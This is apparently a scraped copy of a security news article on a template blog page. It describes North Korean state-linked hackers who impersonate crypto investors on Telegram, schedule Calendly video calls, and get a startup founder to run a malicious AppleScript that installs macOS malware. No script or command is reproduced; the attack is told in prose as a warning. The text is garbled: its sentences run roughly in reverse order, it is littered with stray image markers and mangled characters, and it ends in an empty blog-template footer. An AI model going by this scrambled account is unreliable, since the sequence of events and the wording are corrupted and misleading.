![]() “At this point, the North Korean hackers coax the team into downloading and running a ‘location-modifying’ malicious script. ![]() “When the project team clicks the link, they encounter a region access restriction,” SlowMist wrote. A search in Google for a string of text from that script turns up a December 2023 blog post from cryptocurrency security firm SlowMist about phishing attacks on Telegram from North Korean state-sponsored hackers. While this a perfectly sane response, it means we don’t have the actual malware that was pushed to his Mac by the script.īut Doug does still have a copy of the malicious script that was downloaded from clicking the meeting link (the online host serving that link is now offline). ![]() Unfortunately for us, Doug freaked out after deciding he’d been tricked - backing up his important documents, changing his passwords, and then reinstalling macOS on his computer. The file that Doug ran is a simple Apple Script (file extension “.scpt”) that downloads and executes a malicious trojan made to run on macOS systems. Lee was trying to scam people on Telegram. In a post to its Twitter/X account last month, Signum Capital warned that a fake profile pretending to be their employee Mr. Going back to his Telegram client to revisit the conversation, Doug discovered his potential investor had deleted the meeting link and other bits of conversation from their shared chat history. It didn’t dawn on Doug until days later that the missed meeting with Mr. Lee apologized for the inconvenience and said they would have to reschedule their meeting, but he never responded to any of Doug’s follow-up messages. Please refer to this script as a temporary solution.”ĭoug said he ran the script, but nothing appeared to happen after that, and the videoconference application still wouldn’t start. “We are actively working on fixing these problems. “Some of our users are facing issues with our service,” the message read. ![]() Lee account on Telegram, who said there was some kind of technology issue with the video platform, and that their IT people suggested using a different meeting link.ĭoug clicked the new link, but instead of opening up a videoconference app, a message appeared on his Mac saying the video service was experiencing technical difficulties. Lee arrived, Doug clicked the meeting link in his calendar but nothing happened. When the day and time of the scheduled meeting with Mr. Sure, Doug said, here’s my Calendly profile, book a time and we’ll do it then. The investor expressed interest in financially supporting Doug’s startup, and asked if Doug could find time for a video call to discuss investment prospects. Lee’s Twitter/X account, which features the same profile image. Earlier this month, Doug was approached by someone on Telegram whose profile name, image and description said they were Ian Lee, from Signum Capital, a well-established investment firm based in Singapore. The reader spoke on condition that their name not be used in this story, so for the sake of simplicity we’ll call him Doug.īeing in the cryptocurrency scene, Doug is also active on the instant messenger platform Telegram. KrebsOnSecurity recently heard from a reader who works at a startup that is seeking investment for building a new blockchain platform for the Web. But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on macOS systems. The attackers impersonate established cryptocurrency investors and ask to schedule a video conference call. Malicious hackers are targeting people in the cryptocurrency space in attacks that start with a link added to the target’s calendar at Calendly, a popular application for scheduling appointments and meetings.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |